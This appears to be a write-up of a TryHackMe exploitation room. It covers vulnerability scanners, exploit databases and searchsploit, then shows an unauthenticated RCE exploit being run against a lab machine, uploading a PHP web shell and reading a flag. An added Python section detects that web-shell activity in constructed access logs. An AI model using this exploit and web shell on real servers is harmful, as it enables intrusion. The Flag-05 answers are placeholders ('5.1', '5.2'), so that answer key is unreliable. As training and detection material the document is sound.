Overview
Author: @anir0y
Room: Exploit Vulnerabilities [Subscription Required]
Task 01: Introduction
In this room, we are going to be going over some means of identifying vulnerabilities and coupling our research skills to learn how these can be abused.
Task 02: Automated Vs. Manual Vulnerability Research
There is a myriad of tools and services available in cybersecurity for vulnerability scanning. Ranging from being commercial (and footing a heavy bill) to open-source and free, vulnerability scanners are convenient means of quickly canvassing an application for flaws.
For example, the vulnerability scanner Nessus has both a free (community) edition and a commercial one. The commercial version, costing thousands of pounds for a year's licence, will likely be used in organisations providing penetration testing services or audits.
I have detailed some of the advantages and disadvantages of using a vulnerability scanner in the table below:
Frameworks such as Metasploit often have vulnerability scanners as modules; this is something you will come on to learn about in a later module in this pathway.
Manual scanning for vulnerabilities is often the weapon of choice of a penetration tester when testing individual applications or programs. In fact, manual scanning involves searching for the same vulnerabilities and uses similar techniques as automated scanning.
Ultimately, both techniques involve testing an application or program for vulnerabilities. These vulnerabilities include:
If you are keen to learn more about these vulnerabilities, the OWASP framework will be a useful read to you.
Flag-02
Question | Answer |
---|---|
You are working close to a deadline for your penetration test and need to scan a web application quickly. Would you use an automated scanner? (Yay/Nay) | yay |
You are testing a web application and find that you are able to input and retrieve data in a database. What vulnerability is this? | injection |
You manage to impersonate another user. What vulnerability is this? | Broken Access Control |
Task 03: Finding Manual Exploits
Rapid7
Much like other services such as Exploit DB and NVD, Rapid7 is a vulnerability research database; the only difference is that this database also acts as an exploit database. Using this service, you can filter by type of vulnerability (i.e. application and operating system).
Additionally, the database contains instructions for exploiting applications using the popular Metasploit tool (you will learn about this tool in-depth later in the learning path). For example, this entry on Rapid7 is for “Wordpress Plugin SP Project & Document”, where we can see instructions on how to use an exploit module to abuse this vulnerability.
GitHub
GitHub is a popular web service designed for software developers. The site is used to host and share the source code of applications to allow a collaborative effort. However, security researchers have taken to this platform for the same reasons. Security researchers store and share PoCs (Proofs of Concept) on GitHub, turning it into an exploit database in this context.
GitHub is extremely useful for finding rare or fresh exploits because anyone can create an account and upload; there is no formal verification process like there is with alternative exploit databases. With that said, there is also a downside: PoCs may not work, and little to no support will be provided.
GitHub uses a tagging and keyword system, meaning that we can search GitHub by keywords such as “PoC”, “vulnerability”, and many more. At the time of writing, there are 9,682 repositories with the keyword “cve”. We are also able to filter the results by programming language.
Searchsploit
Searchsploit is a tool that is available on popular pentesting distributions such as Kali Linux. It is also available on the TryHackMe AttackBox. This tool is an offline copy of Exploit-DB, containing copies of exploits on your system.
You are able to search searchsploit by application name and/or vulnerability type. For example, in the snippet below, we are searching searchsploit for exploits relating to Wordpress that we can use – no downloading necessary!
Flag-03
Question | Answer |
---|---|
What website would you use as a security researcher if you wanted to upload a Proof of Concept? | GitHub |
You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use? | searchsploit |
Task 04: Example of Manual Exploitation
We can use the information gathered from task 2 in this room to exploit the vulnerable service. Ultimately, one of the most effective vulnerabilities that we can exploit is the ability to execute commands on the target that is running the vulnerable application or service.
For example, being able to execute commands on the target that is running the vulnerable application or service will allow us to read files or execute commands that we previously wouldn't be able to perform using the application or service alone. Additionally, we can abuse this to gain what is known as a foothold on the machine. A foothold is access to the vulnerable machine's console, from where we can then begin to exploit other applications or machines on the network.
We are going to use an exploit to perform remote code execution on the application from task 2 to be able to remotely execute commands on the vulnerable machine.
Before we start, it is important to note that exploits rarely come out of the box and are ready to be used. They often require some configuration before they will work for our environment or target. The level of configuration will vary upon the exploit, so you will often find multiple exploits for the same vulnerability on an application. It is up to you to figure out which exploit is the most appropriate or useful to you.
For example, in the snippet below, we can see that a few options have been changed to reflect the IP address of the machine that we are attacking from.
Once we have configured the exploit correctly, let’s further read this exploit to understand how to use it. In the snippet below, we can see that we need to provide two arguments when running the exploit:
With this information in mind, we are now ready to use this exploit on the vulnerable machine. We are going to do the following:
- Use the exploit to upload a malicious file to the vulnerable application containing whatever command we wish to execute, where the web server will run this malicious file to execute the code.
- The file will first contain a basic command that we will use to verify that the exploit has worked.
- Then we are going to read the contents of a file located on the vulnerable machine.
Flag-04
Question | Answer |
---|---|
What type of vulnerability was used in this attack? | RCE |
Task 05: Practical: Manual Exploitation
Deploy the machine attached to this task and wait a minimum of five minutes for it to be fully set up. After five minutes, visit the web server running on the machine by navigating to http://MACHINE_IP in the browser of the device connected to the THM network (your own or the AttackBox).
5.1
Open the IP in a web browser and look at the footer area:
5.2
Look for a vulnerability:
searchsploit online book store
------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                    | Path
------------------------------------------------------------------ ---------------------------------
GotoCode Online Bookstore - Multiple Vulnerabilities              | asp/webapps/17921.txt
Online Book Store 1.0 - 'bookisbn' SQL Injection                  | php/webapps/47922.txt
Online Book Store 1.0 - Arbitrary File Upload                     | php/webapps/47928.txt
Online Book Store 1.0 - Unauthenticated Remote Code Execution     | php/webapps/47887.py
------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
We have an Unauthenticated Remote Code Execution entry; let's use this to exploit the application. Copy the exploit:
searchsploit -m php/webapps/47887.py
Run the exploit:
python 47887.py http://10.10.18.54
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.18.54/bootstrap/img/PQytuI1suX.php
> Example command usage: http://10.10.18.54/bootstrap/img/PQytuI1suX.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ cat flag.txt
flag{here}
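The defender's side of the attack walked through in Task 04 and run above, as an added example that is not part of the room or this writeup: detection logic run over constructed Apache-style access-log lines, flagging a PHP script being requested from the image directory the upload lands in and the cmd parameter that drives the web shell. The log lines, the attacker address, the timestamps and the STATIC_DIRS list are assumptions; only the /bootstrap/img/ path, the shell filename, ?cmd= and flag.txt come from the output above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access log (not captured from the room's target). The client
# address is a made-up attacker host; the shell path and ?cmd= usage mirror
# the exploit output shown above.
SAMPLE_LOG = """\
10.10.0.99 - - [01/Jan/2024:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120
10.10.0.99 - - [01/Jan/2024:12:00:02 +0000] "GET /bootstrap/img/logo.png HTTP/1.1" 200 2048
10.10.0.99 - - [01/Jan/2024:12:00:04 +0000] "GET /bootstrap/img/PQytuI1suX.php HTTP/1.1" 200 0
10.10.0.99 - - [01/Jan/2024:12:00:05 +0000] "GET /bootstrap/img/PQytuI1suX.php?cmd=whoami HTTP/1.1" 200 9
10.10.0.99 - - [01/Jan/2024:12:00:06 +0000] "GET /bootstrap/img/PQytuI1suX.php?cmd=cat%20flag.txt HTTP/1.1" 200 11
"""

# Directories that should only ever serve static assets; a script requested from
# one of them is the tell-tale of the arbitrary-file-upload step. Assumption:
# this list is site-specific and must be tuned per deployment.
STATIC_DIRS = ("/bootstrap/img/",)
SCRIPT_EXTS = (".php", ".phtml")
# Query parameter the web shell in the exploit output reads its command from.
CMD_PARAMS = ("cmd",)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

def inspect_request(line):
    """Return a finding dict for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path, query = url.path, parse_qs(url.query)
    reasons = []
    if path.lower().endswith(SCRIPT_EXTS) and path.startswith(STATIC_DIRS):
        reasons.append("php_in_static_dir")
    cmd = next((query[p][0] for p in CMD_PARAMS if p in query), None)
    if cmd is not None:
        reasons.append("cmd_parameter")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": path,
            "command": cmd, "reasons": reasons}

def scan_access_log(text):
    """Run inspect_request over every line and keep the hits, in log order."""
    return [f for f in map(inspect_request, text.splitlines()) if f]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The first hit (the bare GET of the uploaded .php) fires before any command is issued, which is the point at which blocking script execution under upload directories would have stopped the chain.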
Flag-05
Question | Answer |
---|---|
Find out the version of the application that is running. What are the name and version number of the application? | 5.1 |
Now use the resources and skills from this module to find an exploit that will allow you to gain remote access to the vulnerable machine. | n/a |
Use this exploit against the vulnerable machine. What is the value of the flag located in a web directory? | 5.2 |